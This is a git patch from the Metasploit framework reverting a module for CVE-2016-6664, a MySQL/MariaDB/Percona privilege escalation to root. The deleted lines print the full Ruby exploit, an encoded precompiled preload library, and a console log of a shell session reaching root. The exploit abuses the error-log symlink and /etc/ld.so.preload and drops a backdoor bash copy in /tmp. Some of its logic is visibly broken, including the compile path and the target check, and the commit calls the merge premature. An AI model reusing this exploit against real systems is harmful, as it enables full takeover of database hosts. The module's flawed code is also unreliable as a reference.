From ff2b8dcf99d76b17d7a482ca56162a073c0f1111 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 22 Jan 2017 19:16:33 -0600
Subject: [PATCH] Revert "Land #7605, Mysql privilege escalation, CVE-2016-6664" - premature merge

This reverts commit 92a1c1ece4da3989bc852d94afd1e2c4b083263a, reversing changes made to 9b16cdf6028bf13119b66ebc21ef3cd19de176b7.
---
 data/exploits/CVE-2016-6664/2016-6664.out | Bin 8240 -> 0 bytes
 .../exploit/linux/local/mysql_priv_esc.md | 127 ----------
 .../exploits/linux/local/mysql_priv_esc.rb | 216 ------------------
 3 files changed, 343 deletions(-)
 delete mode 100755 data/exploits/CVE-2016-6664/2016-6664.out
 delete mode 100644 documentation/modules/exploit/linux/local/mysql_priv_esc.md
 delete mode 100644 modules/exploits/linux/local/mysql_priv_esc.rb
diff --git a/data/exploits/CVE-2016-6664/2016-6664.out b/data/exploits/CVE-2016-6664/2016-6664.out deleted file mode 100755 index 7f32e8dde0871d3f361aef2d8981ec2240e3ef61..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8240 zcmeHMU2Ggz6~60@9Vc<@t!Y~06f%ljk|K4waS~%_OxC{{M@~u|M+y>Vvff$S3;UDo z&Zc%m!NP4IiY%%kK?N@$l?SMV5Ig{FRU8FcN4%J#O6G~EsFF=v;qnu?mGJVNJNK+- z@6J}@1qsR5+Bx@p=jZ;;opX=BHaId=7YYe3Vewf(T(rSMVoI>yrYayY(Jgl3`7zNh zb?di8Rkah19>i1#Lju$WHL<=|vY>{nFtzGD{DPuvM=aSjHhc2MW6Giay}Mf+^cQ4m&l4O5?*xM2SaLd$r~zqUM9C z8jc*>z3>sn@6_4zBH0=F^UoHHFRv7jAG`K^HlO(Eli#5xNWKd{p8szy86k0RY!_jB z@T2AE8+_xPm;UnXS5_`xc;MFy?=}DRkAG`^_u0ZaL^TVI-w2RWJ3;t7@YVqR>oxE= za3es!y9WLw@F4%Azz+uac^+6q+%LK#Muqg35^ochhQFY2U7yym6*Ih~y%hIJe6M&; z?IW>V&s#!=NGG zAML}C_!hKi-VFST?I~=j-5d`*|WPfurY+YZsZmyoRLa$nX*mT?A>~ZC+$#dq} z>;C3?E<;Te4_Wg)hp2WQ{@f<(M$ag?)gBCC)xu-^)p`p+=pWVndA|YunLjCtd)B@P zO|Rc*|8}D{m^E@)S{`4EK}vOWev+o*wbuZYR&Q^XO4jxIzmxineQ$&OiiTQx{prQx zp%Asfx76?7eMJ-KqYi_RD@QVdiy zM~0f)PPgoNqH#`~Y=88VM>`G@OgdOT5rMxc0(zSx*XsKBHq=eP69L<0dj_^=V0#9( zXW;*822{|%@euc&V;+jds4!2l7nLTDl;c`;Z7avKA60UW$M!3pKNanY=eUf%FH~6m zugy}9_;uAV$5hX$pon9ss0zY%lQPPZN95gws`NdiQjVomyrj&8<%!GRM>QRY{Jk=# z8fJWPhlg`N7nL5q-?DIf`25QL&nbO;HYLyPt}FhclE1I`azB;7|25%zv)=AqH4hDH z;_p+GP(S+ck?2ES&FG9C={gea{FLrgdvaVS(GQdM_*S`vvc>O1!P=UQY6`;8SNyn~ski;=R%q;??N<3W@6e zlZQIGe{1tk=NI9ZG~86Uetr%}|6Bd!^Yfg*_@j+r?N$JqL@lM49a4yH4krSzbrZr+nzN#+ZwT(*L-AEQ%@Kkg#-V|$Ksn4VDf92aWG zH2(AA<>}d;;~}OplLsAY7q5IdzUDYJ28?{OJ;zNO^5HKQ7>aG#{-PQn(~m1< z?mz1>Jr6m>%FNFxd!{jEPcZ4|<9C3uj8qqueVG!7!tJv?k3S0;ne>qo3deO!X?#@3 zo^tlO{R}Xg6AlYF&(D6EtM+%EfD(CqoU%9QU#tgny%+sdBTpW|4jdPJvnM|@wi*Z(ia_sUxB|5&r< zxR|NKhKlO*_Y2_7`0@VY`!4^#PS2F}$;_8hnK|5KOMg!8(wKi&slhpoSTj_+4!P$-8zQhu^M(?3Dtw=drV zR0GknrB`7)rf+KYd|!wvd)8w&I=>15VLX10&$^YpB5YnYpYK9K{nz`+_Ma$QdKERD z(uR -[*] Sending stage (36 bytes) to 192.168.205.64 -[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000 - -msf 
exploit(mysql_priv_esc) > set session 45
-session => 45
-msf exploit(mysql_priv_esc) > run
-
-[+] mysqld_safe is running
-[+] The current user is mysql
-[*] Checking if gcc are installed
-[*] Checking if gcc are installed
-[*] Dropping pre-compiled exploit on system
-[*] Writing privesclib to /tmp/fYAMgzW5.so
-[*] Max line length is 65537
-[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf
-[*] Seting up the preload trap
-[*] cp /bin/bash /tmp/mysqlrootsh
-[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log
-[*] kill $(pgrep mysqld)
-[*] /bin//sh: 27: kill: Operation not permitted
-
-[*] Waiting for mysqld to restart...
-[*] Executing escalation.
-[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload
-[*] chmod 755 /etc/ld.so.preload
-[*] /usr/bin/sudo 2>/dev/null >/dev/null
-[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so"
-[*] /tmp/mysqlrootsh -p
-[*] Cleanup done.
-[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target
-msf exploit(mysql_priv_esc) > sessions -i 45 -c "id"
-[*] Running 'id' on shell session 45 (192.168.205.64)
-uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql)
diff --git a/modules/exploits/linux/local/mysql_priv_esc.rb b/modules/exploits/linux/local/mysql_priv_esc.rb
deleted file mode 100644
index b8f6440d93..0000000000
--- a/modules/exploits/linux/local/mysql_priv_esc.rb
+++ /dev/null
@@ -1,216 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require "msf/core"
-
-class MetasploitModule < Msf::Exploit::Local
- Rank = GoodRanking
-
- include Msf::Post::Common
- include Msf::Post::File
- include Msf::Exploit::EXE
- include Msf::Exploit::FileDropper
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'MySQL / MariaDB / Percona - Root Privilege Escalation',
- 'Description' => %q{
- MySQL-based databases including MySQL, MariaDB and Percona are affected
- by a privilege escalation vulnerability which can let attackers who have
- gained access to mysql system user to further escalate their privileges
- to root user allowing them to fully compromise the system.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'x2020 ', # Module
- 'Dawid Golunski' # Discovery
- ],
- 'DisclosureDate' => 'Nov 01 2016',
- 'Platform' => [ 'linux'],
- 'SessionTypes' => ['shell', 'meterpreter'],
- 'Targets' => [ ['Automatic', {}] ],
- 'DefaultTarget' => 0,
- 'DefaultOptions' =>
- {
- 'DisablePayloadHandler' => true
- },
- 'References' =>
- [
- [ 'EDB', '40679'],
- [ 'CVE', '2016-6664'],
- [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']
- ]
- ))
- register_options(
- [
- OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),
- OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
- OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),
- OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
- ], self.class)
- end
-
- def check
-
- def check_reqs?()
- # should have mysqld_safe running
- check_command = "if pgrep mysqld; "
- check_command << "then echo OK; "
- check_command << "fi"
- output = cmd_exec(check_command).gsub("\r", '')
- vprint_status output
- if output['OK'] == 'OK'
- vprint_good "mysqld_safe is running"
- return true
- end
- print_error "mysqld process not running"
- false
- end
-
- def mysql_user?()
- # test for mysql user
- mysql = cmd_exec("id | grep -E '(mysql)'")
- if not mysql.include?("mysql")
- print_error "The current session user (#{mysql}) is not mysql"
- return false
- end
- vprint_good "The current user is mysql"
- true
- end
-
- def preload_exists?()
- if exists?("/etc/ld.so.preload")
- print_error "Found ld.so.preload. Exiting for safety."
- return true
- end
- false
- end
-
- def sudo_exists?()
- @sudo = cmd_exec('which sudo')
- if @sudo.include?("sudo")
- return true
- end
- false
- end
-
- if check_reqs? and mysql_user? and sudo_exists?
- if preload_exists?
- return CheckCode::Detected
- end
- return CheckCode::Appears
- end
-
- CheckCode::Safe
- end
-
- def exploit
-
- if check != CheckCode::Appears
- fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
- end
-
- # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
- def has_prereqs?()
- vprint_status('Checking if gcc is installed')
- if target.name == "Ubuntu"
- gcc = cmd_exec('which gcc')
- if gcc.include?('gcc')
- vprint_good('gcc is installed')
- else
- print_error('gcc is not installed. Compiling will fail.')
- end
- return gcc.include?('gcc')
- else
- return false
- end
- end
-
- compile = has_prereqs?
- if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
- if has_prereqs?()
- compile = true
- vprint_status('Live compiling exploit on system')
- else
- vprint_status('Dropping pre-compiled exploit on system')
- end
- end
-
- # build file names and locations
- privesclib_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".so"
- privescsrc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".c"
- pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
- payload_path = datastore["WritableDir"] + "/" + rand_text_alpha(8)
- backdoorsh = datastore["BackdoorShell"]
- backdoorpath = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
- error_log_file = datastore["ErrorLog"]
-
- # setup the files
- rm_f pwn_file
- if compile
- vprint_status "Writing pwn source to #{privescsrc_file}"
- rm_f privescsrc_file
- write_file(privescsrc_file, privesclib_file)
- cmd_exec("gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl")
- register_file_for_cleanup(privescsrc_file)
- else
- # privesclib.so file
- path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out')
- fd = ::File.open( path, "rb")
- privesclib = fd.read(fd.stat.size)
- fd.close
- vprint_status "Writing privesclib to #{privesclib_file}"
- backdoorpath = "/tmp/mysqlrootsh" # hardcoded into privesclib.so
- write_file(privesclib_file, privesclib)
- end
- register_file_for_cleanup(backdoorpath)
- register_file_for_cleanup(privesclib_file)
-
- # the actual pwning
- def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path)
- print_status "Executing escalation."
- do_cmd_exec("echo #{privesclib_file} > /etc/ld.so.preload")
- do_cmd_exec("chmod 755 /etc/ld.so.preload")
- do_cmd_exec("#{suidbin} 2>/dev/null >/dev/null")
- do_cmd_exec("#{backdoorpath} -p -c \"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\"")
- do_cmd_exec("#{backdoorpath} -p")
- end
-
- # reset system state
- def do_cleanup(error_log_file)
- cmd_exec("rm -f #{error_log_file}")
- cmd_exec("mv -f #{error_log_file}.tmp #{error_log_file}")
- cmd_exec("if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi")
- vprint_status "Cleanup done."
- end
-
- # util cmd_exec with verbose print
- def do_cmd_exec(cmd)
- vprint_status cmd
- r = cmd_exec(cmd)
- if r != ""
- print_status r
- end
- end
-
- # initial setup for pwning
- vprint_status "Seting up the preload trap"
- do_cmd_exec("cp #{backdoorsh} #{backdoorpath}")
- do_cmd_exec("touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}")
- do_cmd_exec("kill $(pgrep mysqld)")
-
- # wait for restart
- print_status "Waiting for mysqld to restart..."
- cmd_exec("while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done", nil, 125)
-
- # pwn the system
- do_pwn(privesclib_file, @sudo, backdoorpath, payload_path)
-
- # cleanup the mess
- do_cleanup(error_log_file)
-
- end
-end